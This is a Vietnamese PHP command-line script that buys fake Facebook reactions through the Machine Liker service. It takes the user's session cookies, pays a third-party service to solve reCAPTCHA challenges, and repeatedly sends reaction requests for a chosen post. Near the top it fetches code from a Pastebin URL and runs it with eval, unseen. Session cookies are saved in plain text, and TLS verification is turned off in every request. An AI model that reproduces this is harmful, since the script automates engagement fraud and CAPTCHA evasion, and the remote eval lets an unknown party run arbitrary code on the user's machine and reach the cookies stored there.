
error_reporting(0);
session_start();
$BBlack="\033[1;30m" ;      
$BRed="\033[1;31m"         ;
$BGreen="\033[1;32m"       ;
$BYellow="\033[1;33m"   ;
$BBlue="\033[1;34m"        ;
$BPurple="\033[1;35m"      ;
$BCyan="\033[1;36m"   ;
$BWhite="\033[1;37m"    ;
$Blue="\033[0;34m";
$lime="\033[1;32m";
$red="\033[1;31m";
$xanh="\033[1;32m";
$cyan="\033[1;36m";
$yellow="\033[1;33m";
$turquoise="\033[1;34m";
$maugi="\033[1;35m";
$white= "\033[1;37m";
$ress = "\033[0;32m";
$res = "\033[0;33m";
$red = "\033[0;31m";
$green = "\033[0;37m";
$yellow = "\033[0;33m";
$white = "\033[0;33m";
$xnhac = "\033[1;96m";
$den = "\033[1;90m";
$do = "\033[1;91m";
$luc = "\033[1;92m";
$vang = "\033[1;93m";
$xduong = "\033[1;94m";
$hong = "\033[1;95m";
$trang = "\033[1;97m";
$do="\033[1;91m";
$maufulldo= "\e[1;47;31m";
$res="\033[0m";
$red="\e[1;31m";
$pink="\e[1;35m";
$green="\e[1;32m";
$yellow="\e[1;33m";
$y2="\033[0;33m";
$white= "\033[0;37m";
$cyan= "\e[1;36m";
$blue="\e[1;34m";
$ngreen="\033[42m";
$ngblack="\033[40m";
$nen="\033[1;47;1;34m";
$ip = file_get_contents('http://kiemtraip.com/raw.php');
date_default_timezone_set('Asia/Ho_Chi_Minh');
$time=date('h:i');
$ngay = date("d-m-Y");
 $banner=
"\r\r
\033[0;97m╔════════════════════════════════════════════════╗
\033[0;97m║\033[1;97m❥ \033[0;92mĐịa Chỉ iP Của Bạn Là: \033[1;97m$ip \033[1;97m       ║
\033[0;97m║\033[1;97m❥ \033[0;92mBản quyền: \033[1;97mDoãn Đình \033[1;97m ║\033[0;97m❥ \033[1;92mĐồng Hồ: \033[1;97m$time \033[0;93m      ║
\033[0;97m║\033[1;97m❥ \033[0;92mYoutube:\033[1;97mCám Chăm Chỉ \033[1;97m ║\033[1;97m❥ \033[0;92mHôm Nay: \033[1;97m$ngay\033[1;97m  ║
\033[0;97m║\033[1;97m❥ \033[0;92mZalo: \033[1;97m0971.932.146 \033[1;97m   ║\033[1;97m❥ \033[0;90mChờ Đợi Là Chân Ái !\033[1;97m ║
\033[0;97m║\033[1;97m❥ \033[0;92mMomo:\033[1;97m0971.932.146 \033[1;97m    ║\033[1;97m❥ \033[0;90mAce Cày Xu Vui Vẻ \033[1;97m   ║
\033[0;97m║\033[1;97m❥ \033[0;92mFb:\033[1;97mfacebook.com/doandinh2004        \033[1;97m          ║
\033[0;97m╚════════════════════════════════════════════════╝\n"; 
   
 
eval(file_get_contents('https://pastebin.com/raw/GA2CLWvi'));
@system('clear');
 


print $banner;
for($v=0;$v<= 10;$v++){ print "\033[1;97m- ";usleep(15000); print "\033[1;97m- ";usleep(15000); } print "\033[1;97m- ";usleep(15000); print "\033[1;97m-";usleep(15000); print"\n";

 



$checkck = file_exists("ckmch.txt");
if($checkck == '1'){
  echo  $green."Nếu Bạn Đã Nhập Cookie$trang Machine Liker$green Trước Đó\nBấm$trang Enter$green Để Tiếp Tục\nBấm$trang No$green Để Nhập Cookie Mới: $trang";
  $choose = trim(fgets(STDIN));
}
if($choose!='' or $checkck !='1'){
do {
unlink("ckmch.txt");
$khocookie = [];
echo chay(7);
echo $green."Nhập Cookie$trang Machine Liker$green Muốn Dừng Thì Bấm Enter\n";
for($a = 1; $a < 999999;$a++){
echo $green."Nhập Cookie$trang Machine Liker$green Thứ $a: $trang";
$nhapck = (string)trim(fgets(STDIN));
if($nhapck == ''){break;}
array_push($khocookie,$nhapck);
$mf = fopen("ckmch.txt", "a+");
$txt = $nhapck."\n";
fwrite($mf, $txt);
fclose($mf);
}
$demcki=count($khocookie);
echo $green."Bạn Đã Nhập ".$trang.$demcki." ".$luc."Cookie Machine Liker\n";
usleep(500000);
} while (count($khocookie)==0);
}else{
  $k = file_get_contents("ckmch.txt");
  $khocookie = explode("\n",$k);
  $s = count($khocookie)-1;
  array_splice($khocookie,$s,1);
}
@system('clear');
echo $banner;
echo chay(7);
$dem = 0;
echo $green."Nhập Link Bài Viết Cần Buff: $trang";
$link= trim(fgets(STDIN));
    echo "\r";
    echo "                                                      \r";
    $a =  $green."Đang Get iD Từ Link Bài Viết";
    $len = strlen($a);
    for ($x = 0; $x < $len; $x++) {
      echo $a[$x];
      usleep(5000);
    }
$result = getid($link);
echo "\r";
echo "                                                      \r";
if (strpos($result, 'error') !== false) {
  $js = json_decode($result,true);
  echo $red.$js['error']."\n";
  exit;
}
$ui1 = explode('id":',$result)[1];
$uid = explode(',',$ui1)[0];
$ke=intval($uid);
if($ke==0){
  echo $red."Lấy Key Lỗi\n";
  echo $green."Nhập iD Bài Viết: $trang";
  $uid= trim(fgets(STDIN));
}else{
  echo $green."iD Của Bạn Là:$trang ".$uid."\n";
}
$id = $uid;
for($v=0;$v<= 10;$v++){ print "\033[1;97m- ";usleep(15000); print "\033[1;97m- ";usleep(15000); } print "\033[1;97m- ";usleep(15000); print "\033[1;97m-";usleep(15000); print"\n";
echo $green."Đăng Kí AnyCaptcha Giá Cực Rẻ Tại\n";
echo $trang."https://anycaptcha.com?referral=1804\n";
for($v=0;$v<= 10;$v++){ print "\033[1;97m- ";usleep(15000); print "\033[1;97m- ";usleep(15000); } print "\033[1;97m- ";usleep(15000); print "\033[1;97m-";usleep(15000); print"\n";
echo $green."Nhập API AnyCaptcha: $trang";
$api= trim(fgets(STDIN));
$koh = getany($api);
if($koh['errorId']=='1'){
  echo $red."Api Key AnyCaptcha Không Hợp Lệ\n";
  exit;
}
if($koh['errorId']==0){
  $cost = $koh['balance'];
  echo $green."Số Dư:$trang ".$cost." USD\n";
}
for($v=0;$v<= 10;$v++){ print "\033[1;97m- ";usleep(15000); print "\033[1;97m- ";usleep(15000); } print "\033[1;97m- ";usleep(15000); print "\033[1;97m-";usleep(15000); print"\n";
$type = '';
echo $green."Bật Buff Like (y/n):$trang"; 
$c = trim(fgets(STDIN));
if ($c=='y'){
  $type = $type."1";
}
echo $green."Bật Buff Care (y/n):$trang";
$c = trim(fgets(STDIN));
if ($c=='y'){
  if ($type==''){
    $type = $type."16";
  }else{
    $type = $type.",16";
  }
}
echo $green."Bật Buff Haha (y/n):$trang";
$c = trim(fgets(STDIN));
if ($c=='y'){
  if ($type==''){
    $type = $type."4";
  }else{
    $type = $type.",4";
  }
}
echo $green."Bật Buff Tim (y/n):$trang";
$c = trim(fgets(STDIN));
if ($c=='y'){
  if ($type==''){
    $type = $type."2";
  }else{
    $type = $type.",2";
  }
}
echo $green."Bật Buff Wow (y/n):$trang ";
$c = trim(fgets(STDIN));
if ($c=='y'){
  if ($type==''){
    $type = $type."3";
  }else{
    $type = $type.",3";
  }
}
echo $green."Bật Buff Sad (y/n):$trang ";
$c = trim(fgets(STDIN));
if ($c=='y'){
  if ($type==''){
    $type = $type."7";
  }else{
    $type = $type.",7";
  }
}
echo $green."Bật Buff Angry (y/n):$trang";
$c = trim(fgets(STDIN));
if ($c=='y'){
  if ($type==''){
    $type = $type."8";
  }else{
    $type = $type.",8";
  }
}
$pi = $type;
 echo chay(7);
$tai = 1; 
$stt = 0;
$tong = 0;
while($tai==1){
 for($xz=0;$xz<count($khocookie);$xz++){
   $coo = $khocookie[$xz];
    echo "\r";
    echo "                                                      \r";
    $a =  $green."Đang Giải Captcha Vui Lòng Đợi";
    $len = strlen($a);
    for ($x = 0; $x < $len; $x++) {
      echo $a[$x];
      usleep(5000);
    }
    cap:
    $naoh = giaicaptcha($id,$api);
    if($naoh['errorId']=='5'){
      echo "\r";
    echo "                                                      \r";
    $a =  $red."Bạn Không Có Đủ Tiền Để Giải Captcha\n";
    $len = strlen($a);
    for ($x = 0; $x < $len; $x++) {
      echo $a[$x];
      usleep(5000);
    }
    exit;
    }
    if($naoh['errorId']=='0'){
      $task = $naoh['taskId'];
      $trangthai = 'tttoriginal';
      while($trangthai!='ready'){
        sleep(15);
        $kk = gettask($task,$api);
        if($kk['errorId']==61){
          GOTO cap; 
        }
        if($kk['errorId']==16){
          GOTO cap; 
        }
        $trangthai = $kk['status'];
      }
      $rec = $kk['solution']['gRecaptchaResponse'];
      echo "\r";
      echo "                                                      \r";
      $a =  $green."Đang Tiến Hành Buff";
      for ($x = 0; $x < $len; $x++) {
        echo $a[$x];
        usleep(5000);
      }
    }
    $url = "https://www.machine-liker.com/api/send-reactions/"; 
    $data="post_id=$id&reactions=$pi&limit=150&g-recaptcha-response=$rec"; 
    $curl = curl_init(); 
    curl_setopt_array($curl, array( CURLOPT_PORT => "443", CURLOPT_URL => "$url", CURLOPT_RETURNTRANSFER => true, CURLOPT_ENCODING => "", CURLOPT_SSL_VERIFYPEER => false, CURLOPT_TIMEOUT => 30, CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1, CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POSTFIELDS => $data, CURLOPT_HTTPHEADER => array( "Host:www.machine-liker.com", "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36", "content-type:application/x-www-form-urlencoded; charset=UTF-8", "Cookie:$coo", ) )); 
    $result = curl_exec($curl);
    $err = curl_error($curl); 
    curl_close($curl); 
    $js = json_decode($result,true); 
    if($js["status"] == "ok"){
        echo "\r";
        echo "                                                      \r";
        $stt++;
        $mess = $js["info"]["total_reactions"];
        $a = "\033[1;97m[\033[1;90m".$stt."\033[1;97m] \033[1;97m[\033[1;90m".date("H:i")."\033[1;97m] \033[1;97m[\033[1;32mBuff Thành Công\033[1;97m]\033[1;32m Tổng$trang ".$mess."$green Like\n";
        $len = strlen($a);
        for ($x = 0; $x < $len; $x++) {
          echo $a[$x];
          usleep(5000);
        }
    }else{
      echo "lỗi\r";
    }
}
$tim = 600-(count($khocookie)-1)*30;
delay($tim);
}
function delay($delay) {
    $time = $delay; 
    for ( $x = $time; $x--; $x ) {
       echo "                                                      \r";
       echo "\e[1;97mVui Lòng Chờ ".$x." \e[1;97mgiây";
       usleep(200000);
       echo "\r";
       echo "                                                      \r";
       echo "\e[1;90mVui Lòng Chờ ".$x."\e[1;90m giây";
       usleep(200000);
       echo "\r";
       echo "                                                      \r";
       echo "\e[1;97mVui Lòng Chờ ".$x."\e[1;97m giây";
       usleep(200000);
       echo "\r";
       echo "                                                      \r";
       echo "\e[1;90mVui Lòng Chờ ".$x."\e[1;90m giây";
       usleep(200000);
       echo "\r";
       echo "                                                      \r";
       echo "\e[1;97mVui Lòng Chờ ".$x."\e[1;97m giây";
       usleep(200000);
       echo "\r";
      
}}
function getid($link) {
  $ch = curl_init('https://id.traodoisub.com/api.php');
$data= ('link=').$link;
$head[] = "Host:id.traodoisub.com";
$head[] = "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36";
$head[] = "content-type:application/x-www-form-urlencoded; charset=UTF-8";
curl_setopt($ch, CURLOPT_PORT, "443");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch,CURLOPT_TIMEOUT,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function getany($api){
$ch = curl_init('https://api.anycaptcha.com/getBalance');
$data = array("clientKey" => "$api");
$postdata = json_encode($data);
$head[] = "Accept: application/json";
$head[] = "Content-Type: application/json";
curl_setopt($ch, CURLOPT_PORT, "443");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch,CURLOPT_TIMEOUT,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
$result = curl_exec($ch);
curl_close($ch); 
$js = json_decode($result,true); 
return $js;
}
function giaicaptcha($idpost,$api){
  $ch = curl_init('https://api.anycaptcha.com/createTask');
$data = array("clientKey" => "$api","task" => array ("type" => "RecaptchaV2TaskProxyless" ,"websiteURL" => "https://www.machine-liker.com/send-reactions","websiteKey" => "6Lep9tcbAAAAAM2kEgRg75zhxNJt2mHYabpIIOL2"));
$postdata = json_encode($data);
$head[] = "Accept: application/json";
$head[] = "Content-Type: application/json";
curl_setopt($ch, CURLOPT_PORT, "443");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch,CURLOPT_TIMEOUT,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
$result = curl_exec($ch);
curl_close($ch);
$js = json_decode($result,true); 
return $js; 
}
function gettask($task,$api){
  $ch = curl_init('https://api.anycaptcha.com/getTaskResult');
$data = array("clientKey" => "$api","taskId" => "$task");
$postdata = json_encode($data);
$head[] = "Accept: application/json";
$head[] = "Content-Type: application/json";
curl_setopt($ch, CURLOPT_PORT, "443");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
curl_setopt($ch, CURLOPT_ENCODING, "");
curl_setopt($ch,CURLOPT_TIMEOUT,0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
$result = curl_exec($ch);
curl_close($ch); 
$js = json_decode($result,true); 
return $js; 
}
function chay($so){
  for($v=0;$v<= $so;$v++){
    echo "\033[1;97m"."-";usleep(20000);echo " \033[1;97m"."-";usleep(20000);echo " \033[1;97m"."-";usleep(20000);echo " \033[1;97m"."";usleep(20000);
} echo "\n";
}
